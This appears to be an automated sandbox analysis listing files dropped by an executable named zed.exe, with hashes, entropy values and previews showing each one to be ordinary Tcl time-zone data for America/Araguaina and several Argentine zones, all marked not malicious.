                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Araguaina) {.. {-9223372036854775808 -11568 0 LMT}.. {-1767214032 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2048
                                                                                                                                                                                                                                            Entropy (8bit):3.7664759014118188
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5p9uuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0wi:jIu3pfe92jCs/VOHv2kdeRtnxafwwfF0
                                                                                                                                                                                                                                            MD5:2B9A1EDE5110B46E24F4726664EA1E3F
                                                                                                                                                                                                                                            SHA1:939D1A7A50544F34B318ACDB52BC6930FE453F6D
                                                                                                                                                                                                                                            SHA-256:BC86AC89121EC4AA302F6259CCC97EFFD7022DC6CEE3B291C57DA72B6EA0C558
                                                                                                                                                                                                                                            SHA-512:C204740DACBCECF2CC5CF4FEB687E86B9150512623203C999D6F4EB5FB246D07681A35C28D8445F6A50F49940C321E0AA5E51FE5A73B8ED076F29CEB5B4D4CA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Buenos_Aires) {.. {-9223372036854775808 -14028 0 LMT}.. {-2372097972 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2077
                                                                                                                                                                                                                                            Entropy (8bit):3.742645155048276
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5/nuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0NC:Vuu3pfe92jCs/VOHv2kdeRtnxafww3mP
                                                                                                                                                                                                                                            MD5:3D2AF5714DFC392ED4BC976784D5A58A
                                                                                                                                                                                                                                            SHA1:9252DE40B6EF872E1D2F7CDD53DDD21145E93C5C
                                                                                                                                                                                                                                            SHA-256:A516BB0937977EF949D47B3C8675E30F1CA6C34F8BD298DCF6EBB943580D5317
                                                                                                                                                                                                                                            SHA-512:8D5FFDB5B578B8EA0291D3A21BDDE25F8301CB16B11AE794FFBA8DCFFE46F6AC5EC03D93E511061B132D84E69E5FAF1BB212837EB8A5A4B4BE517F783837E615
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Catamarca) {.. {-9223372036854775808 -15788 0 LMT}.. {-2372096212 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522740
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):242
                                                                                                                                                                                                                                            Entropy (8bit):4.72138001874583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/290/MquQ90/MMXAy:MByMY/MYp/MrRt290/MquQ90/MK
                                                                                                                                                                                                                                            MD5:8A609667DE461CEDC1127BE38B161459
                                                                                                                                                                                                                                            SHA1:557D2D55DEA38D1CD1103E183F89C65F4016662B
                                                                                                                                                                                                                                            SHA-256:8CCD6FC77D55582938F1912B1BA66035882D1BFC18A797C631E5E89ABFBF570B
                                                                                                                                                                                                                                            SHA-512:DBAFDA069DB5FDBCBA11050AC91A733C1712BD6395939CFFFC5EAA78BD0B70B4AF2D9FB8954C6841CCF3AC5F8EDCF08E604D3F2CF67F1CBEA5EB6D3C4DC7F2FA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2043
                                                                                                                                                                                                                                            Entropy (8bit):3.7481312409221594
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5lxQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0n:/xBu3pfe92jCs/VOHv2kdeRtnxafww3j
                                                                                                                                                                                                                                            MD5:8C1D665A25E61CE462C2AC57687763BF
                                                                                                                                                                                                                                            SHA1:B5BBC26CF6A24BD5BEA42AC485D62C789B80905F
                                                                                                                                                                                                                                            SHA-256:FA75E274240A341C6BFE3539CFDC114D125AEAEA3161D3C2409347CF8046042A
                                                                                                                                                                                                                                            SHA-512:A89A7A92C025B87DA4CDFE99BF70CD0E64690D7BFE827DCBFBF0E91B188003FA26487E72B6B950D3BFC9C854B890E5936F414BBEAAD5F3F0673AC5EFE273CDF4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Cordoba) {.. {-9223372036854775808 -15408 0 LMT}.. {-2372096592 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2041
                                                                                                                                                                                                                                            Entropy (8bit):3.7481290145270245
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5HluuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwcSPAC8OS0E:xwu3pfe92jCs/VOHv2kdeRtnxafwcDCK
                                                                                                                                                                                                                                            MD5:995EDE9E1E86DB500C7437A196325E21
                                                                                                                                                                                                                                            SHA1:4A8FB1511AA124CA2D299EC8DE155EE9D0479180
                                                                                                                                                                                                                                            SHA-256:43EB79ABC03CBAC661C563DE1BC09D9DD855CBC72DD2B6467EA98F0F90421BA9
                                                                                                                                                                                                                                            SHA-512:B58B35EA1B2F0388B8108DCF254F3BD1B21894F00A9F313ABC093BC52C36FCDD94B7486DBA38161C9EFCDB12BC3CD81E7E02395B0CA480A7F01148C43CD3054F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Jujuy) {.. {-9223372036854775808 -15672 0 LMT}.. {-2372096328 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2106
                                                                                                                                                                                                                                            Entropy (8bit):3.744252944523733
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5lduuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0NC:Tou3pfe92jCs/VOHv2kdeRtnxafwwkFP
                                                                                                                                                                                                                                            MD5:4A45A063D45EB94214005EF3CA5BCD6D
                                                                                                                                                                                                                                            SHA1:2420E8591DC53A39EE1A58B2E45DCFAF9503685F
                                                                                                                                                                                                                                            SHA-256:2B018B791E48269FA9EDA12662FFEC3E2DC33603A918E8B735B8D7D6BEB3B3AA
                                                                                                                                                                                                                                            SHA-512:0B2824FA3D40B2EDBE8488D50C30368F4CF6E45A39FF6DEBC5BB4FD86F85AD52F5331AD1EB50E5166FA2E735B7E8AA9D94A5FED9421334DB0499524DBE08F737
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/La_Rioja) {.. {-9223372036854775808 -16044 0 LMT}.. {-2372095956 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2077
                                                                                                                                                                                                                                            Entropy (8bit):3.738002814507529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5CPBuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwGSmSc8OSI:GUu3pfe92jCs/VOHv2kdeRtnxafwGJld
                                                                                                                                                                                                                                            MD5:F6CB24E8567B2443224E9E17EE438BFE
                                                                                                                                                                                                                                            SHA1:8029426C30C4C645EA77C6240391CDB1C3107568
                                                                                                                                                                                                                                            SHA-256:DC39400BBFD5BDDDC174FE099194806FBFD3FC3AA20E670D67BE0AC35FE97AD4
                                                                                                                                                                                                                                            SHA-512:6869CFC24C21FBB2DFCCAA9AE7E21A0B24DC002EE792FB28A8F2F05C75C20E93C95A39BD8653AA272AF10FE95922B99EECC1208AACE814817D9441F84360E867
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Mendoza) {.. {-9223372036854775808 -16516 0 LMT}.. {-2372095484 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2080
                                                                                                                                                                                                                                            Entropy (8bit):3.7580685839169545
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5oQuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0NC:qBu3pfe92jCs/VOHv2kdeRtnxafwwfFP
                                                                                                                                                                                                                                            MD5:212D13CE27AF114A8EC2E04023D218C4
                                                                                                                                                                                                                                            SHA1:C4C5F86BC6EC0D5EA4C9CF199309D085767B97E8
                                                                                                                                                                                                                                            SHA-256:A05B6708DEFF0607396BFC6661C2287341C3432841AE353D94A67AC742B5FAFA
                                                                                                                                                                                                                                            SHA-512:CE7201EEA6A86FB49641410D2EEE4030EDB1B96F3218D764762F5AE23883C796F5742ED69CEC985A9D3582D6C72ED74114DE81508F6DEB4B54865B6974ADC965
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Rio_Gallegos) {.. {-9223372036854775808 -16612 0 LMT}.. {-2372095388 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-7522
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2011
                                                                                                                                                                                                                                            Entropy (8bit):3.7415813345133975
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5NPuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OS0wF:72u3pfe92jCs/VOHv2kdeRtnxafww3mz
                                                                                                                                                                                                                                            MD5:A06C33CDFD7E7B630CB1DF34E72E61E5
                                                                                                                                                                                                                                            SHA1:694826B9B910DA0BD70A9CB547C26E6838B08111
                                                                                                                                                                                                                                            SHA-256:CAEFC60F2F36EF9FFE0C5921C3C392DE1E95755683A96C1C4EC0BA2C242A4D84
                                                                                                                                                                                                                                            SHA-512:D6696A6C14EECF2B77EC586F40137BDD95E5CE5C5193570C809FAB9E5FCA4B8744283CEB6818E525C73F6EFF657274410B2622902EE8C15912C8D5F5FA5C805E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Salta) {.. {-9223372036854775808 -15700 0 LMT}.. {-2372096300 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2106
                                                                                                                                                                                                                                            Entropy (8bit):3.747934819596411
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5vXxuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwkFC8OS0K:hUu3pfe92jCs/VOHv2kdeRtnxafwwkFl
                                                                                                                                                                                                                                            MD5:32A50D0ABF408D9E59C0580D5B8CC472
                                                                                                                                                                                                                                            SHA1:EA5BB8860982F8BAFEAEFDE1D6ACD440DA132DFE
                                                                                                                                                                                                                                            SHA-256:41B2C25E42146A76934B866061BB3245B8ADA0FF4E1BFBA6F8842A30BDD5C132
                                                                                                                                                                                                                                            SHA-512:E5D2521A4EF53AAD3E74506708EC2768C4D2EE8D6D014DCCF4A6DC290B713B4D46021B66527548C35004E10D753E1B685EEFD55BBE7BF01EC6104D7D8AAC4403
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Juan) {.. {-9223372036854775808 -16444 0 LMT}.. {-2372095556 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2081
                                                                                                                                                                                                                                            Entropy (8bit):3.7399269084699975
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5MDuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafw6bS2nZSbdI:yCu3pfe92jCs/VOHv2kdeRtnxafwWnZr
                                                                                                                                                                                                                                            MD5:FB06B66F5D41709C7E85C8B1E9BFCFA0
                                                                                                                                                                                                                                            SHA1:D5C0C4B12C6190856C300321B1C106C7474BA54B
                                                                                                                                                                                                                                            SHA-256:A43B35F25E54EF359D046E33281C0A978F0EE8811C93A6809F1F65750878BBB6
                                                                                                                                                                                                                                            SHA-512:D445F46D6A17A075AD995885E45234A711F53BF3FE2DFC6DFBB611E8AC154B10C91E137927DD66D6A7C596A93BAE5DE283796F341B5095FA0DD05595E1C3A077
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/San_Luis) {.. {-9223372036854775808 -15924 0 LMT}.. {-2372096076 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-75227400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2105
                                                                                                                                                                                                                                            Entropy (8bit):3.741704529449777
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5yZujuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafww3mC8OSf:suiu3pfe92jCs/VOHv2kdeRtnxafww3w
                                                                                                                                                                                                                                            MD5:D9497141EC0DC172E5FF5304FED0BE6B
                                                                                                                                                                                                                                            SHA1:CD20A4F0C127A84791093010D59DF119DD32340A
                                                                                                                                                                                                                                            SHA-256:0F7DB23E1280FC19A1FB716E09A9699ADA2AAE24084CAD472B4C325CC9783CCF
                                                                                                                                                                                                                                            SHA-512:0B71952055013CD6045ED209FD98168083550655FAB91B7870C92098E40C4FE6827EAAF922D34ECE28298CBB14327A76AD6780D480E552F52F865AA11A4AA083
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Tucuman) {.. {-9223372036854775808 -15652 0 LMT}.. {-2372096348 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2075
                                                                                                                                                                                                                                            Entropy (8bit):3.7445758155279836
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5SHuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0jE:YOu3pfe92jCs/VOHv2kdeRtnxafwwfFn
                                                                                                                                                                                                                                            MD5:16A89FD2CDEE50E534301A9797311A9D
                                                                                                                                                                                                                                            SHA1:4A4EBA1798214C7CF5ACDC0B2EC8B4716CD968CB
                                                                                                                                                                                                                                            SHA-256:10B6FF51314D8EE1D010187D8805C4E3D71B778BC6DECB26E66193A5BB3E9EA2
                                                                                                                                                                                                                                            SHA-512:DBB0BA3F8AA2B54C86EA8B6530C16DF95AF1331FC5F843B113A204DA20B8EF011FE93C27EB917D01B9040D4914057687B4AACCD292A847559AF69150D1BDC4B5
                                                                                                                                                                                                                                            Malicious:false
